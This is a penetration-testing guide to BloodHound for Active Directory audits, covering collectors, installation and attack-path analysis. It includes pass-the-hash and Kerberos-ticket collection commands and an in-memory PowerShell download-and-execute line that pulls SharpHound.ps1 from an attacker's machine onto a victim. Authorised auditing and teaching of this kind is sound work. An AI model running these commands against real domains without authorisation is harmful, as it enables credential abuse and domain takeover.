BloodHound
BloodHound is a fundamental tool in Active Directory audits, designed to identify trust relationships and potential attack vectors within a domain. It allows analysts to understand how an attacker could move laterally or escalate privileges by leveraging existing relationships between domain objects.
This section focuses on explaining the different data collection methods available (collectors), comparing their usage and applicability based on the environment. Additionally, we'll detail the installation process and key differences between classic BloodHound and BloodHound Community Edition (CE).
Throughout this guide, we'll cover:
Different collectors and their usage:
SharpHound.exe: The classic executable
SharpHound.ps1: Ideal for environments with PowerShell enabled
bloodhound-python: Designed for execution from Linux systems
RustHound-CE: The modern collector optimized for BH-CE
NetExec: Allows basic relationship extraction directly from Linux
certipy-ad: Focused on detecting relationships within AD CS environments, exporting in BloodHound CE compatible format
When to use each collector
Step-by-step installation for both classic BloodHound and BloodHound CE
Practical use cases in real audits or simulated environments
The objective is to clearly document how to work with BloodHound, integrate it into an audit, and maximize its capabilities.
For BloodHound to generate a useful and accurate domain graph, it's first necessary to perform an information collection phase. This task falls to the collectors, which are responsible for extracting structural data from the Active Directory environment: relationships between users and groups, active sessions, delegations, object permissions, among others.
Several collectors are currently available, each designed to adapt to different operational scenarios, privilege levels, or environment restrictions. Choosing the appropriate collector depends on both the technical context and the analysis objectives.
In this section, we document the main collectors used in AD audits, including their installation, execution, and particularities:
SharpHound.exe: The classic executable for Windows environments
SharpHound.ps1: PowerShell alternative useful in environments with more restrictive policies
bloodhound-python: Cross-platform collector, ideal for collection from Linux systems
RustHound-CE: Designed for BloodHound Community Edition, with a more modular and efficient approach
This section aims to serve as a practical reference for selecting and using the most appropriate collector based on the environment and audit objectives.
⚠️ VERY IMPORTANT!
Whenever we obtain a new user, it's recommended to run the BloodHound collector again with those credentials. It's possible that the first user had limited permissions to enumerate the domain, and with the new one we can obtain more relationships or privileges that weren't visible before.
Therefore, with each new account, the ideal approach is to run the collector again and generate a new .zip with updated information about the environment.
Via APT
Via PIP
Via PIPX
Via cloning repository
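A hedged sketch of the four installation routes above for bloodhound-python (package and repository names are the commonly published ones; verify them against your distribution):

```bash
# Via APT (Debian/Kali; the package name may vary, e.g. bloodhound.py)
sudo apt update && sudo apt install -y bloodhound.py

# Via PIP
pip3 install bloodhound

# Via PIPX
pipx install bloodhound

# Via cloning the repository
git clone https://github.com/dirkjanm/BloodHound.py
cd BloodHound.py
pip3 install .
```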
Resources:
It's recommended to synchronize time with the DC first to avoid KRB_AP_ERR_SKEW issues.
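One common way to do this, assuming 10.10.10.10 is the DC (ntpdate may need to be installed first):

```bash
sudo ntpdate 10.10.10.10
```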
Username and password authentication
Pass-the-Hash (PtH) authentication
Kerberos authentication (.ccache)
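A hedged sketch of the three authentication methods for bloodhound-python; domain, DC and IP values are placeholders:

```bash
# Username and password
bloodhound-python -u 'user' -p 'Password123!' -d corp.local -ns 10.10.10.10 -c All --zip

# Pass-the-Hash (LM:NT format; the LM part can be left empty)
bloodhound-python -u 'user' --hashes ':<NT_hash>' -d corp.local -ns 10.10.10.10 -c All --zip

# Kerberos with a .ccache ticket
export KRB5CCNAME=/path/to/user.ccache
bloodhound-python -u 'user' -k -no-pass -d corp.local -ns 10.10.10.10 -dc dc01.corp.local -c All --zip
```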
Once Rust is installed on your system, install RustHound-CE with the following command:
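A hedged sketch, assuming installation through Cargo (crate and repository names as published by the project):

```bash
# From crates.io
cargo install rusthound-ce

# Or build from the repository
git clone https://github.com/g0h4n/RustHound-CE
cd RustHound-CE
cargo build --release
```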
Resource:
Username and password authentication
Kerberos authentication (.ccache)
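A hedged sketch of both methods; flag names may differ slightly between RustHound-CE versions, so check rusthound-ce --help:

```bash
# Username and password
rusthound-ce -d corp.local -u 'user@corp.local' -p 'Password123!' -z

# Kerberos with a .ccache ticket
export KRB5CCNAME=/path/to/user.ccache
rusthound-ce -d corp.local -f dc01.corp.local -k -z
```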
Resource:
Load SharpHound.ps1 from a web server hosting the PS1 script (this can be your own attacking machine).
Once the PowerShell script is on the victim machine, you can also import it as follows:
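A hedged sketch of both approaches; the attacker IP and file names are placeholders, and Invoke-BloodHound is the function exposed by SharpHound.ps1:

```powershell
# Load the script in memory from a web server under our control
# (on the attacker machine: python3 -m http.server 80)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/SharpHound.ps1')

# Or import it from disk if it is already on the victim machine
Import-Module .\SharpHound.ps1

# Run the collection and package the results into a zip
Invoke-BloodHound -CollectionMethod All -ZipFileName loot.zip
```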
Resource:
Transfer the binary to the victim machine and execute it to collect information.
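A hedged sketch of a basic run; the collection method and output name are just examples:

```powershell
.\SharpHound.exe -c All --zipfilename loot.zip
```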
Username and password authentication
Pass-the-Hash (PtH) authentication
Kerberos authentication (.ccache)
Username and password authentication
LDAP (Port 389)
LDAPS (Port 636)
Pass-the-Hash (PtH) authentication
LDAP (Port 389)
LDAPS (Port 636)
Kerberos authentication (.ccache)
LDAP (Port 389)
LDAPS (Port 636)
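Assuming this subsection corresponds to NetExec (listed among the collectors in the introduction), a hedged sketch of its LDAP-based collection; exact option names can vary between versions, so confirm with nxc ldap --help:

```bash
# Username and password over LDAP on port 389 (add --port 636 for LDAPS)
nxc ldap 10.10.10.10 -u 'user' -p 'Password123!' --bloodhound --collection All --dns-server 10.10.10.10

# Pass-the-Hash
nxc ldap 10.10.10.10 -u 'user' -H '<NT_hash>' --bloodhound --collection All --dns-server 10.10.10.10

# Kerberos with a .ccache ticket
export KRB5CCNAME=/path/to/user.ccache
nxc ldap dc01.corp.local --use-kcache --bloodhound --collection All --dns-server 10.10.10.10
```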
Username and password authentication
LDAP (Port 389)
LDAPS (Port 636)
Pass-the-Hash (PtH) authentication
LDAP (Port 389)
LDAPS (Port 636)
Kerberos authentication (.ccache)
LDAP (Port 389)
LDAPS (Port 636)
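Assuming this subsection corresponds to certipy-ad (the AD CS-focused collector from the introduction), a hedged sketch of its find command; it accepts Impacket-style authentication options and -scheme to choose between LDAP and LDAPS, and the binary may be named certipy or certipy-ad depending on how it was installed (confirm with certipy find -h):

```bash
# Username and password (add -scheme ldaps for port 636, -scheme ldap for 389)
certipy find -u 'user@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -bloodhound

# Pass-the-Hash
certipy find -u 'user@corp.local' -hashes ':<NT_hash>' -dc-ip 10.10.10.10 -bloodhound

# Kerberos with a .ccache ticket
export KRB5CCNAME=/path/to/user.ccache
certipy find -u 'user@corp.local' -k -no-pass -target dc01.corp.local -dc-ip 10.10.10.10 -bloodhound
```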
Update repositories and install docker-compose on your system.
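A minimal sketch (package name as found in the Debian/Kali repositories):

```bash
sudo apt update && sudo apt install -y docker-compose
```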
Download the docker-compose.yml file with cURL and verify it downloaded correctly.
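A hedged sketch using the short link published in the official BloodHound CE documentation (verify the URL against the current docs):

```bash
curl -L https://ghst.ly/getbhce -o docker-compose.yml
ls -l docker-compose.yml
```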
You can also create the docker-compose.yml content directly:
docker-compose.yml
Start the containers defined in the docker-compose.yml file.
Verify that the containers are running and there haven't been any failures.
Check the initial password in the logs.
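A hedged sketch of these three steps, assuming the docker-compose.yml is in the current directory:

```bash
# Start the containers in the background
sudo docker-compose up -d

# Check that all containers are up and healthy
sudo docker-compose ps

# Retrieve the randomly generated initial password from the logs
sudo docker-compose logs | grep -i "Initial Password"
```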
Access http://localhost:8080 and use the following credentials:
Username: admin
Password: Initial password obtained in the previous step
Enter the initial password in the first field, and in the second field a new password that meets the established requirements.
Typically 12 characters minimum, 1 uppercase, 1 lowercase, 1 number and 1 special symbol.
You now have BloodHound CE correctly installed on your system through Docker.
In my case, the docker-compose.yml file lives in the /opt/BloodHound-CE directory. This way, regardless of which directory I'm in, I can start it directly with the following command.
To start BloodHound-CE, the containers must already have been created as described in the previous steps.
The command sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml up -d recreates the containers from scratch, which is useful if the docker-compose.yml has been modified. In our case we won't modify it, so we should use start to launch it.
To stop BloodHound-CE and free the ports it uses, run the stop command shown below. Afterwards, it can be started again with the previous command or with sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml start.
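A summary of the start and stop commands with the compose file in /opt/BloodHound-CE:

```bash
# Start the existing containers
sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml start

# Stop the containers and free the ports they use
sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml stop
```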
To upload our information collected through the Collectors, we need to go to http://localhost:8080. Once we're in the BloodHound-CE panel, we'll perform the following steps:
Go to the "Administration" section
Access the "File Ingest" tab
Click on "Upload File(s)"
Click inside the box or drag our .zip or individual JSON files directly
Select our compressed file
Once our file is selected, click the Upload option
Confirm that the message appears indicating they have been uploaded correctly. Click Close
Verify that, once the collected data has been integrated, its status shows as Complete. If another status such as Cancelled appears, re-upload the file. If the problem persists, it is very likely a compatibility issue with the collector used; try a different one.
Once everything is uploaded, we can use BloodHound-CE and navigate the interface.
When we want to delete the data that BloodHound-CE has stored from previously uploaded files, we can perform a "deep cleaning" that leaves no trace of the ingested data. To do this, we'll follow these steps:
Access the "Administration" section
Go to the "Database Management" section
Check all boxes for "deep cleaning"
Click the "Proceed" option
Enter the keyword to confirm deletion "Please delete my data"
Once the confirmation word is entered, click "Confirm"
Once we have uploaded our data to BloodHound-CE, we can navigate the interface by accessing the "Explore" section.
In the SEARCH section, we can search for a node/object we want to query. If it doesn't appear, it means it doesn't exist or wasn't found during information collection (probably due to permissions issues).
When we click on a node/object, the following menu appears in the right sidebar with the node/object's different subsections, which we'll explore below.
We have several sub-sections, although the most relevant for now are:
Object Information
Member Of
Outbound Object Control
Inbound Object Control
In the Object Information section, all the node/object information will appear. Among the information we can highlight:
Distinguished Name
Whether the user has DONT_REQ_PREAUTH set (i.e., is susceptible to AS-REP Roasting)
Whether it's enabled
The Pathfinding functionality in BloodHound CE allows searching for attack paths from a starting node to a target, evaluating privileges and relationships between users and groups.
In this example, we start from OLIVIA@ADMINISTRATOR.HTB, which has GenericAll over MICHAEL@ADMINISTRATOR.HTB, allowing total control over that account. In turn, MICHAEL can force a password change for BENJAMIN@ADMINISTRATOR.HTB, completing the attack chain.
This type of view is key to identifying real paths for privilege escalation or lateral movements within the domain.
In BloodHound CE, edges represent relationships between domain objects. These relationships can be of different types: group membership (MemberOf), ACL-based rights (GenericAll, GetChanges, etc.), active sessions, delegations, and many others.
When we click on an edge, a panel opens with more detail about that relationship. This panel includes different sections:
General
Windows Abuse
Linux Abuse
References
Shows a technical description of the detected relationship.
BloodHound CE allows manually marking domain objects as Owned (compromised) or High Value (priority targets). This helps us better visualize audit progress and focus path analysis on critical assets.
These marks are applied by right-clicking on the node. Once marked, the node is visually highlighted in the graph with the corresponding icon.
Owned: We mark a node as compromised when we already have control over it (for example, if we get credentials or remote execution).
High Value: We mark high-value targets that are critical to our objectives.
In the Group Management panel, we can manage objects marked as Owned or High Value in an organized way. Its use is summarized in the following steps:
Access the Group Management section from the people icon (left sidebar)
Select the group we want to review (Owned or High Value)
Choose the environment, normally All Active Directory Domains
Apply filters if we want to see only certain types of nodes (User, Group or Computer, etc.)
The list of objects belonging to that group is displayed, along with their type and status
By clicking on a node, its detailed information is displayed on the right: name, SID, OS, last logon, delegations, etc.
This section allows visual control of compromised objectives and planning next movements within the domain.
In this section, we can launch queries in Cypher language to query relationships within the BloodHound graph. It's very useful for searching attack paths or listing critical objects more precisely.
BloodHound CE already comes with several predefined queries, such as:
Kerberoastable users
Shortest paths to Domain Admins
List of all Domain Admins
Principals with dangerous privileges (DCSync, GenericAll, etc.)
We can also modify these queries or create our own based on what we need to search for in the environment.
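As an illustration, a couple of simple Cypher queries of the kind those predefined searches run; property and label names follow the BloodHound schema, so adjust them to your data:

```cypher
// Users with an SPN set (Kerberoastable candidates)
MATCH (u:User {hasspn:true}) RETURN u

// Shortest paths from any node to the Domain Admins group (RID 512)
MATCH p = shortestPath((n)-[*1..]->(g:Group))
WHERE g.objectid ENDS WITH "-512" AND n <> g
RETURN p
```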
BloodHound CE allows creating and saving our own queries in Cypher. This gives us flexibility to search for specific relationships in the graph and reuse those searches in future audits.
The following GitHub repository contains some ready-made queries that we can add:
In this case, we paste the query we want to run, click "Save Query", assign it a name, and verify that it has been saved. Clicking on it will run the saved query.
Update repositories and install BloodHound and Neo4j for BloodHound to work correctly.
Open Neo4j in a separate terminal; the web interface will start at http://localhost:7474
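A hedged sketch of these two steps (Kali/Debian package names):

```bash
# Install the legacy BloodHound GUI and Neo4j
sudo apt update && sudo apt install -y bloodhound neo4j

# In a separate terminal, start Neo4j; the web interface listens on http://localhost:7474
sudo neo4j console
```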
Access http://localhost:7474 and enter the following default credentials:
Username: neo4j
Password: neo4j
It will ask you to change the password.
Once you've modified the Neo4j password, open BloodHound in the background in a new terminal.
Enter the neo4j user and the new password you just set. You can save the credentials for automatic connection.
Once you log in, BloodHound will start correctly and you can navigate within it.
To start BloodHound once the installation is complete, execute the following commands.
In a separate terminal, open Neo4j. You should wait for the output line indicating that the web interface is enabled at http://localhost:7474
Open BloodHound in the background. If you have stored credentials with the check, it will log in automatically.
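A sketch of the two commands referenced above:

```bash
# Terminal 1: start the Neo4j database
sudo neo4j console

# Terminal 2: launch the BloodHound GUI in the background
bloodhound &
```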
You need to have Rust installed on Kali. You can follow the official rustup instructions to install it.
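A hedged sketch using the official rustup installer:

```bash
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
```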